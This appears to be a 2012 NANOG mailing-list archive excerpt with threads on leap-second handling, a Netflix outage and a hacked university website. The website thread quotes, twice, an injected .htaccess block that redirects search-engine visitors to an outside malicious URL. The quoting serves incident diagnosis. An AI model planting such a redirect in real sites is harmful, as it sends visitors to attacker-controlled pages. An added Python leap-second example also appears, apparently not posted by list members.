rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| > > jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l > > ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse > > 
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea > > rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s > > uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin > > e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| > > westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) > RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] > > #/c3284d# > > # # # > > matthew black > information technology services > california state university, long beach > > > > -----Original Message----- > From: Jason Hellenthal [mailto:jhellenthal at dataix.net] > Sent: Wednesday, June 27, 2012 6:26 AM > To: Arturo Servin > Cc: nanog at nanog.org > Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) > > > What would be nice is the to see the contents of the htaccess file > (obviously with sensitive information excluded) > > On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: > > > > It was not DNS issue, but it was a clear case on how community-support > helped. > > > > Some of us may even learn some new tricks. :) > > > > Regards, > > as > > > > Sent from mobile device. Excuse brevity and typos. > > > > > > On 27 Jun 2012, at 05:07, Daniel Rohan wrote: > > > > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer < > bortzmeyer at nic.fr>wrote: > > > > > > What made you think it can be a DNS cache poisoning (a very rare > > >> event, despite what the media say) when there are many much more > > >> realistic possibilities (specially for a Web site written in > > >> PHP)? > > >> > > >> What was the evidence pointing to a DNS problem? > > >> > > > > > > It seems likely that he made a mistake in his analysis of the evidence. 
> > > Something that could happen to anyone when operating outside of a > comfort > > > zone or having a bad day. Go easy. > > > > > > -DR > > > > -- > > - (2^(N-1)) > > > > > > > > -- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer From nick at foobar.org Tue Jul 3 13:33:05 2012 From: nick at foobar.org (Nick Hilliard) Date: Tue, 03 Jul 2012 19:33:05 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703175905.GA15977@pob.ytti.fi> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> Message-ID: <4FF33AE1.50105@foobar.org> On 03/07/2012 18:59, Saku Ytti wrote: > Leap bugs are NOT known. Most people have no idea unixtime is not > monotonically increasing. > I had no idea myself until sunday, I had assumed we really go 59 -> 60 -> > 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2. > To me this is fundamentally and inherently broken. Well, yeah, it's not obvious that a minute can have anywhere between 59 and 62 seconds. Certainly if POSIX were being redesigned, they ought to consider using libtai. Google's approach to this is interesting: > http://googleblog.blogspot.ie/2011/09/time-technology-and-leaping-seconds.html i.e. controlled clock slew until the correct offset is reached, thereby allowing their developers to assume a monotonic system clock. 
Nick

From kyle.creyts at gmail.com Tue Jul 3 13:33:23 2012
From: kyle.creyts at gmail.com (Kyle Creyts)
Date: Tue, 3 Jul 2012 14:33:23 -0400
Subject: No DNS poisoning at Google (in case of trouble, blame the DNS)
In-Reply-To:
References: <20120627075051.GA11061@nic.fr> <20120627132604.GA74019@DataIX.net>
Message-ID:

and upon further investigation, it seems like there might be an actual
organization using a host with that IP...
http://www.robtex.com/dns/chatwithus.net.html#shared

On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts wrote:
> it actually appears that skywire has a suballocation for that block,
> http://www.robtex.com/ip/208.88.11.111.html#whois
>
> #
> # The following results may also be obtained via:
> # http://whois.arin.net/rest/nets;q=208.88.11.111?showDetails=true&showARIN=false&ext=netref2
> #
>
> American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 - 208.88.11.255
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255
>
> #
> # ARIN WHOIS data and services are subject to the Terms of Use
> # available at: https://www.arin.net/whois_tou.html
> #
>
> On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black wrote:
>
>> By the way, FTP access originated from: 208.88.11.111
>>
>> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
>> 208.88.11.255
>>
>> NetRange: 208.88.8.0 - 208.88.11.255
>> CIDR: 208.88.8.0/22
>> OriginAS: AS40603
>> NetName: SKYWIRE-SG
>> NetHandle: NET-208-88-8-0-1
>> Parent: NET-208-0-0-0-0
>> NetType: Direct Allocation
>> Comment: http://www.skywireusa.com
>> RegDate: 2008-03-04
>> Updated: 2012-03-02
>> Ref: http://whois.arin.net/rest/net/NET-208-88-8-0-1
>>
>> OrgName: Sky Wire Communications
>> OrgId: DGSU
>> Address: 946 W Sunset Blvd Ste L
>> City: St George
>> StateProv: UT
>> PostalCode: 84770
>> Country: US
>> RegDate: 2007-12-04
>> Updated: 2009-11-04
>> Ref: http://whois.arin.net/rest/org/DGSU
>>
>>
>> Who We Are
>> Skywire Communications is the Leading High Speed Internet Provider in
>> Southern Utah. Offering Service in St George, Washington, Santa Clara,
>> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
>> provide high speed internet access to 100 Percent of Southern Utah. We are
>> located in St George, Utah.
>>
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>> -----Original Message-----
>> From: Matthew Black [mailto:Matthew.Black at csulb.edu]
>> Sent: Wednesday, June 27, 2012 9:52 AM
>> To: 'Jason Hellenthal'; Arturo Servin
>> Cc: nanog at nanog.org
>> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the
>> DNS)
>>
>> Ask and ye shall receive:
>>
>> # more .htaccess (backup copy)
>>
>> #c3284d#
>>
>> RewriteEngine On
>> RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
>> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
>>
>> #/c3284d#
>>
>> # # #
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>> -----Original Message-----
>> From: Jason Hellenthal [mailto:jhellenthal at dataix.net]
>> Sent: Wednesday, June 27, 2012 6:26 AM
>> To: Arturo Servin
>> Cc: nanog at nanog.org
>> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the
>> DNS)
>>
>>
>> What would be nice is to see the contents of the htaccess file
>> (obviously with sensitive information excluded)
>>
>> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>> >
>> > It was not DNS issue, but it was a clear case on how community-support
>> helped.
>> >
>> > Some of us may even learn some new tricks. :)
>> >
>> > Regards,
>> > as
>> >
>> > Sent from mobile device. Excuse brevity and typos.
>> >
>> >
>> > On 27 Jun 2012, at 05:07, Daniel Rohan wrote:
>> >
>> > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <bortzmeyer at nic.fr> wrote:
>> > >
>> > > What made you think it can be a DNS cache poisoning (a very rare
>> > >> event, despite what the media say) when there are many much more
>> > >> realistic possibilities (specially for a Web site written in
>> > >> PHP)?
>> > >>
>> > >> What was the evidence pointing to a DNS problem?
>> > >>
>> > >
>> > > It seems likely that he made a mistake in his analysis of the
>> evidence.
>> > > Something that could happen to anyone when operating outside of a
>> comfort
>> > > zone or having a bad day. Go easy.
>> > >
>> > > -DR
>> >
>>
>> --
>>
>> - (2^(N-1))
>>
>
>
>
> --
> Kyle Creyts
>
> Information Assurance Professional
> BSidesDetroit Organizer
>

--
Kyle Creyts

Information Assurance Professional
BSidesDetroit Organizer

From saku at ytti.fi Tue Jul 3 13:42:57 2012
From: saku at ytti.fi (Saku Ytti)
Date: Tue, 3 Jul 2012 21:42:57 +0300
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF33AE1.50105@foobar.org>
References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <4FF33AE1.50105@foobar.org>
Message-ID: <20120703184257.GA15997@pob.ytti.fi>

On (2012-07-03 19:33 +0100), Nick Hilliard wrote:

> Google's approach to this is interesting:
>
> > http://googleblog.blogspot.ie/2011/09/time-technology-and-leaping-seconds.html

Yes. I'm sure this is good enough for most people, most people don't need
precise time but virtually everyone needs monotonic time. And this is easy
to deploy; TAI + UTC presentation using leapsecond file lookup isn't exactly
easy. Too bad this isn't a standard configuration option in NTPd.

Also one thing I wonder, why did GOOG choose to skew in just 24h, why not
from the moment the leap is announced? Everyone has some accuracy budget,
whatever that might be, it almost certainly is the same every day. So you
could live with a tighter accuracy budget the longer you spend skewing.

PC clock on average is probably like 15PPM accurate (or an order of
magnitude worse, IBM servers seem to be the exception). If you'd skew 3
months, your skewing would cause inaccuracy of 0.19PPM.
Skewing in a single day causes inaccuracy of 11.6PPM (still almost certainly
better than a free-running PC oscillator)

--
  ++ytti

From kmedcalf at dessus.com Tue Jul 3 14:06:11 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Tue, 03 Jul 2012 13:06:11 -0600
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF33AE1.50105@foobar.org>
Message-ID:

God damn that's a horrid piece of shit web site. You have to disable
security and permit remote code execution or it does not work. What a crock!

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

> -----Original Message-----
> From: Nick Hilliard [mailto:nick at foobar.org]
> Sent: Tuesday, 03 July, 2012 12:33
> To: Saku Ytti
> Cc: nanog at nanog.org
> Subject: Re: F-ckin Leap Seconds, how do they work?
>
> On 03/07/2012 18:59, Saku Ytti wrote:
> > Leap bugs are NOT known. Most people have no idea unixtime is not
> > monotonically increasing.
> > I had no idea myself until Sunday, I had assumed we really go 59 -> 60 ->
> > 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2.
> > To me this is fundamentally and inherently broken.
>
> Well, yeah, it's not obvious that a minute can have anywhere between 59 and
> 62 seconds. Certainly if POSIX were being redesigned, they ought to
> consider using libtai.
>
> Google's approach to this is interesting:
>
> > http://googleblog.blogspot.ie/2011/09/time-technology-and-leaping-seconds.html
>
> i.e. controlled clock slew until the correct offset is reached, thereby
> allowing their developers to assume a monotonic system clock.
>
> Nick

From jra at baylink.com Tue Jul 3 14:24:16 2012
From: jra at baylink.com (Jay Ashworth)
Date: Tue, 3 Jul 2012 15:24:16 -0400 (EDT)
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com>
Message-ID: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "Wolfgang S. Rupprecht"

> Maybe we should stop wrenching the poor system time back and forth. We
> no longer add or subtract daylight savings time (or timezones) to the
> kernel time, why do we do it with leapseconds? We should really move
> the leapseconds correction into the display routines like DST and
> timezones already are. I believe the Olson time code already has ifdefs
> for doing this. I wonder why the system's internal time isn't run that
> way.

I cannot tell you how (literally) shocked I was, to learn from John Stultz
(at IBM, the first guy, apparently, to locate the current screwup and
create kernel patches for it) that *the kernel gets this so wrong*.

It's so off that I wasn't sure I was interpreting the situation properly
until you posted this.

This pain should have been undergone at least 15 years ago; 235960 is
a perfectly valid timestamp; ISO8601 says so.

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA      http://photo.imageinc.us             +1 727 647 1274

From george.herbert at gmail.com Tue Jul 3 14:26:35 2012
From: george.herbert at gmail.com (George Herbert)
Date: Tue, 3 Jul 2012 12:26:35 -0700
Subject: FYI Netflix is down
In-Reply-To: <24628127.12292.1341337095357.JavaMail.root@benjamin.baylink.com>
References: <24628127.12292.1341337095357.JavaMail.root@benjamin.baylink.com>
Message-ID: <84917B1C-C092-4A19-829D-784107198E1F@gmail.com>

On Jul 3, 2012, at 10:38 AM, Jay Ashworth wrote:

> ----- Original Message -----
>> From: "Steven Bellovin"
>
>> Subject: Re: FYI Netflix is down
>> On Jul 2, 2012, at 3:43 PM, Greg D. Moore wrote:
>>
>>> At 03:08 PM 7/2/2012, George Herbert wrote:
>>>
>>> If folks have not read it, I would suggest reading Normal Accidents
>>> by Charles Perrow.
>>
>> Strong second to that suggestion.
>
> Quite unfortunately, that book appears not to be in Safari's library.
>
> Does anyone here know anyone at Safari?
Not the Safari division, but ORA yes, others at my company do. Will
forward the suggestion.

George William Herbert
Sent from my iPhone

From jra at baylink.com Tue Jul 3 14:27:07 2012
From: jra at baylink.com (Jay Ashworth)
Date: Tue, 3 Jul 2012 15:27:07 -0400 (EDT)
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <779D9856-CAC8-478E-BB7F-96913F8E6D6D@delong.com>
Message-ID: <10203536.12328.1341343627358.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "Owen DeLong"

> DST is a time-zone specific phenomenon.

Nobody said *anything* about DST; that's a complete red herring to
discussions of leap seconds.

> Leap seconds are changes to the actual core time. UTC moves with leap
> seconds.

Correct.

> The system clock needs to be UTC, not UTC ± some offset stuck
> somewhere that keeps some form of running tally of the current leap
> second offset since the epoch.

Nope. UTC *includes* leap seconds already. It's UT1 that does not.

Are you suggesting that NTP timekeeping should be based on UT1?

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA      http://photo.imageinc.us             +1 727 647 1274

From jra at baylink.com Tue Jul 3 14:33:42 2012
From: jra at baylink.com (Jay Ashworth)
Date: Tue, 3 Jul 2012 15:33:42 -0400 (EDT)
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <217021.1341327089@turing-police.cc.vt.edu>
Message-ID: <123504.12334.1341344022612.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "valdis kletnieks"

> When the published API has been "the system clock is in UTC" for some 3
> decades, I hardly think it's acceptable to call apps "buggy" for assuming that
> the system clock is in fact using UTC and breaking if you switch it to
> something that's not UTC.
> And the new time *has* to have different semantics
> than UTC, because if it doesn't then what's the point of changing it?

Correct. It's very likely that there is *no* sufficiently compelling
application requirement that justifies switching NTP from UTC to UT1/TAI.

So far as I can tell, the *only* requirement is "I need to be able to
calculate unixtime<->ISO8601 reliably to the second for times further away
than the next possible leapsecond"; I have not had pointed out to me yet an
application which actually requires that; I'm 99 44/100% certain that there
isn't one with a sufficiently compelling story to break 3 decades of code.

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA      http://photo.imageinc.us             +1 727 647 1274

From dot at dotat.at Tue Jul 3 14:44:01 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 20:44:01 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF33AE1.50105@foobar.org>
References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <4FF33AE1.50105@foobar.org>
Message-ID:

Nick Hilliard wrote:
>
> Well, yeah, it's not obvious that a minute can have anywhere between 59 and
> 62 seconds.

No a minute cannot have 62 seconds. That is an old documentation bug which
has been fixed.

http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/time.h.html

Tony.
--
f.anthony.n.finch  http://dotat.at/
Viking, North Utsire, South Utsire: Southeasterly 4 or 5, increasing 6 at
times. Moderate. Occasional rain, fog patches. Moderate, occasionally very
poor.
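Added example, not code posted by anyone in this thread, that works through the behaviour argued about above around the 2012-06-30 leap second: Saku Ytti's 59 -> 59 -> 00, Jay Ashworth's 235960 being a valid timestamp, Tony Finch's point that the seconds field runs 0..60 and not 0..61, the controlled slew Nick Hilliard points to in Google's post, and the parts-per-million arithmetic in Saku's follow-up. The leap-second table is a hand-typed excerpt (a real deployment reads the complete, current list), and the function names and the "POSIX seconds plus TAI-UTC" count are my own conventions, not the kernel's or libtai's:

```python
"""Leap-second arithmetic around 2012-06-30T23:59:60Z (added example)."""
import calendar

# Hand-typed excerpt of the leap-second table, as (UTC date on which the new
# offset takes effect, TAI - UTC in seconds).  A deployment would read the
# complete, current list instead of embedding it like this.
LEAP_TABLE = [
    ((2009, 1, 1), 34),
    ((2012, 7, 1), 35),   # the leap second this thread is about
    ((2015, 7, 1), 36),
    ((2017, 1, 1), 37),
]
BASE_TAI_MINUS_UTC = 33   # offset in force before the first entry above


def _midnight(ymd):
    """POSIX timestamp of 00:00:00 UTC on the given (year, month, day)."""
    return calendar.timegm(ymd + (0, 0, 0))


def tai_minus_utc(posix_ts):
    """TAI - UTC offset (seconds) in force at a POSIX timestamp."""
    offset = BASE_TAI_MINUS_UTC
    for ymd, off in LEAP_TABLE:
        if posix_ts >= _midnight(ymd):
            offset = off
    return offset


def is_leap_minute(y, m, d, hh, mm):
    """True if this UTC minute ends with an inserted 23:59:60."""
    minute_start = calendar.timegm((y, m, d, hh, mm, 0))
    return any(_midnight(ymd) == minute_start + 60 for ymd, _ in LEAP_TABLE)


def utc_to_posix(y, m, d, hh, mm, ss):
    """UTC broken-down time -> POSIX seconds.

    POSIX tm_sec allows 0..60 (the old 0..61 was a documentation bug), and
    :60 is accepted only where the table schedules a leap second.  POSIX
    time has no slot for that second, so 23:59:60 yields the same number as
    23:59:59: the clock repeats a second, which is the 59 -> 59 -> 00 step.
    """
    if not 0 <= ss <= 60:
        raise ValueError("seconds field must be 0..60")
    if ss == 60:
        if not is_leap_minute(y, m, d, hh, mm):
            raise ValueError("ss=60 is only valid at a scheduled leap second")
        ss = 59
    return calendar.timegm((y, m, d, hh, mm, ss))


def utc_to_tai_seconds(y, m, d, hh, mm, ss):
    """UTC broken-down time -> a monotonic TAI-based count (my convention:
    POSIX-style seconds plus TAI-UTC).  TAI has no leap seconds, so
    23:59:59, 23:59:60 and 00:00:00 map to three consecutive integers."""
    posix = utc_to_posix(y, m, d, hh, mm, ss)
    extra = 1 if ss == 60 else 0   # the inserted second sits between 59 and 00
    return posix + tai_minus_utc(posix) + extra


def smear_clock(elapsed, window):
    """Linear smear in the style Google describes: `elapsed` true seconds
    into a window of `window` seconds that ends at the leap instant.
    Returns how far the smeared clock has advanced; at the end it is exactly
    1 s behind, so it reads 23:59:59 while UTC says 23:59:60 and never has
    to step backwards."""
    if not 0 <= elapsed <= window:
        raise ValueError("elapsed lies outside the smear window")
    return elapsed - elapsed / window


def smear_rate_ppm(window):
    """Frequency error, in parts per million, of hiding 1 s over `window` s."""
    return 1e6 / window


def demo():
    """The three instants around the 2012 leap second under both scales."""
    instants = [(2012, 6, 30, 23, 59, 59), (2012, 6, 30, 23, 59, 60),
                (2012, 7, 1, 0, 0, 0)]
    return [(utc_to_posix(*t), utc_to_tai_seconds(*t)) for t in instants]


if __name__ == "__main__":
    for posix, tai in demo():
        print(f"posix={posix}  tai={tai}")
    print(f"24 h smear: {smear_rate_ppm(86400):.2f} ppm, "
          f"60-day smear: {smear_rate_ppm(60 * 86400):.3f} ppm")
```

The POSIX column comes out as 1341100799, 1341100799, 1341100800 while the TAI-based column is three consecutive integers. Note that the TAI mapping only works because its input is the broken-down UTC time with the :60 present; from a bare POSIX value of 1341100799 alone there is no way to tell the first occurrence of that second from the second one, which is exactly why a stored timestamp compared against a later reading can see the clock go backwards, and why a timer written as `deadline = now + n` runs a second long or short across the leap. The smear avoids the step at the cost of a rate error of 1e6/window ppm: about 11.57 ppm for a 24 h window and about 0.19 ppm for a 60-day one.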
From roll at Stupi.SE Tue Jul 3 21:49:40 2012
From: roll at Stupi.SE (Peter Lothberg)
Date: Tue, 3 Jul 2012 21:49:40 CEST
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com>
Message-ID:

> > Maybe we should stop wrenching the poor system time back and forth. We
> > no longer add or subtract daylight savings time (or timezones) to the
> > kernel time, why do we do it with leapseconds? We should really move
> > the leapseconds correction into the display routines like DST and
> > timezones already are. I believe the Olson time code already has ifdefs
> > for doing this. I wonder why the system's internal time isn't run that
> > way.
>
> I cannot tell you how (literally) shocked I was, to learn from John Stultz
> (at IBM, the first guy, apparently, to locate the current screwup and
> create kernel patches for it) that *the kernel gets this so wrong*.
>
> It's so off that I wasn't sure I was interpreting the situation properly
> until you posted this.
>
> This pain should have been undergone at least 15 years ago; 235960 is
> a perfectly valid timestamp; ISO8601 says so.

I leave the computer kernels out of this for a second..:-)

We have a timescale that runs at constant speed forward; it's named "TAI",
and it is based on the definition of the atomic second.

Some systems like GPS have their own idea of a "base time" and then they
have a way of telling the difference between "their timescale" and UTC. In
the case of GPS, they took the number of leap seconds currently in play
when the system was launched and kept that. (As their calendar is 1024
weeks, most receivers use the UTC-GPS offset to figure out what modulo 1024
weeks we are in.)

TAI is atomic time, UTC(k) is what we use for practical timekeeping, and
the problem at hand is that the atomic second runs at constant speed, but
the earth does not.

Leapseconds can be both positive and negative, but up to now, the earth has
only slowed down, so we have added seconds.

There are applications on the earth that deal with the earth's position in
respect to other planets and the sun, so in order to have one timescale for
everyone UTC is compensated for the earth rotation speed; when the solar
time differs from atomic time by more than 0.94 seconds, we compensate by
adding or deleting a second in the last minute of the last day of a month,
in practice they have picked new-years and jun/jul.

You have all heard "GMT"; if we don't insert leap seconds as the earth is
slowing down, "GMT" will be "PMT" (Paris mean time) in some 65000 years.
And day and night will be swapped in 12*65000 years.

So in order to avoid having to ask someone giving you a time and date what
timescale he/she refers to, we have UTC, and as all things in life it's a
compromise.

--Peter

Ps: fix your broken code, most systems can handle "leap days" by now, every
4 years, except years that end with 00..

From owen at delong.com Tue Jul 3 14:46:34 2012
From: owen at delong.com (Owen DeLong)
Date: Tue, 3 Jul 2012 12:46:34 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120703175905.GA15977@pob.ytti.fi>
References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi>
Message-ID: <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com>

On Jul 3, 2012, at 10:59 AM, Saku Ytti wrote:

> On (2012-07-03 10:11 -0700), Owen DeLong wrote:
>
>> Trading one known set of bugs for a (probably) larger set of unknown bugs is not my definition of progress. Cost without progress is harmful and should be avoided.
>
> Leap bugs are NOT known. Most people have no idea unixtime is not
> monotonically increasing.
> I had no idea myself until Sunday, I had assumed we really go 59 -> 60 ->
> 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2.
> To me this is fundamentally and inherently broken.
>
> It's quite hard to find code which stores timestamp and then compares it in
> future to timestamp which assumes time can travel backwards.
> Most bugs are just things that should last 5s last 6s or 4s, but certainly
> the bugs exist and developers were not aware that they exist.
>
>
> --
> ++ytti

If you don't know that time is not monotonically increasing, then that only
becomes a software bug when you codify your own ignorance into software you
write.

It is well known that leap seconds exist.

The rotation of the planet does not line up well with the orbit of the
planet and neither of these lines up particularly well with the rotation
and orbit of the moon.

Since we have a long standing tradition of using the orbit of the earth to
determine years and the orbit of the moon to divide years into months, we
use some fudge-factors on the months to make years and months line up. (12
true months would leave us several days short of a complete orbit at the
end of the year and seasons would migrate.)

Since we have a tradition of measuring diurnal and other repetitive cycles
(days) based on the rotation of the earth, we end up with fudge factors to
make that line up with months from time to time (leap seconds).

So it goes. Time is much more complex than many people realize. If you
write software where time matters, it is your responsibility to learn about
these things.

Owen

From malayter at gmail.com Tue Jul 3 15:00:07 2012
From: malayter at gmail.com (Ryan Malayter)
Date: Tue, 3 Jul 2012 15:00:07 -0500
Subject: FYI Netflix is down
Message-ID:

Jon Lewis wrote:
> It seems like if you're going to outsource your mission critical
> infrastructure to "cloud" you should probably pick at least 2
> unrelated cloud providers and if at all possible, not outsource the
> systems that balance/direct traffic...and if you're really serious
> about it, have at least two of these setup at different facilities
> such that if the primary goes offline, the secondary takes over. If a
> cloud provider fails, you redirect to another.

Really, you need at least three independent providers. One primary (A),
one backup (B), and one "witness" to monitor the others for failure. The
witness site can of course be low-powered, as it is not in the data plane
of the applications, but just participates in the control plane. In the
event of a loss of communication, the majority clique wins, and the
isolated environments shut themselves down. This is of course how any sane
clustering setup has protected against "split brain" scenarios for decades.

Doing it the right way makes the cloud far less cost-effective and far less
"agile". Once you get it all set up just so, change becomes very difficult.
All the monitoring and fail-over/fail-back operations are generally
application-specific and provider-specific, so there's a lot of lock-in.
Tools like RightScale are a step in the right direction, but don't really
touch the application layer. You also have to worry about the availability
of yet another provider!

--
RPM

From roll at Stupi.SE Tue Jul 3 22:07:26 2012
From: roll at Stupi.SE (Peter Lothberg)
Date: Tue, 3 Jul 2012 22:07:26 CEST
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
Message-ID:

And I forgot:

They made a "mistake" and missed their intentions of a solar day year 1900
when defining the atomic second. Off by 2s in 100 years.
-p

From kmedcalf at dessus.com Tue Jul 3 15:08:01 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Tue, 03 Jul 2012 14:08:01 -0600
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <10203536.12328.1341343627358.JavaMail.root@benjamin.baylink.com>
Message-ID: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com>

> > The system clock needs to be UTC, not UTC ± some offset stuck
> > somewhere that keeps some form of running tally of the current leap
> > second offset since the epoch.

> Nope. UTC *includes* leap seconds already. It's UT1 that does not.

> Are you suggesting that NTP timekeeping should be based on UT1?

The system clock should be based on UT1 and should be monotonically
increasing since this matches the common concept of time. Calculations done
with this value are all based on it being UT1 and using the "common" notion
of UT1 rules. The root cause of the difficulties is that someone decided
that the system clock would not maintain "wall clock" time (UT1) but rather
some other timebase and then "step" that time to keep it in sync with UT1.

NTP can keep time in UTC (or anything else) if it wants, but it should
discipline the system clock to monotonically increasing UT1.

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From saku at ytti.fi Tue Jul 3 15:09:53 2012
From: saku at ytti.fi (Saku Ytti)
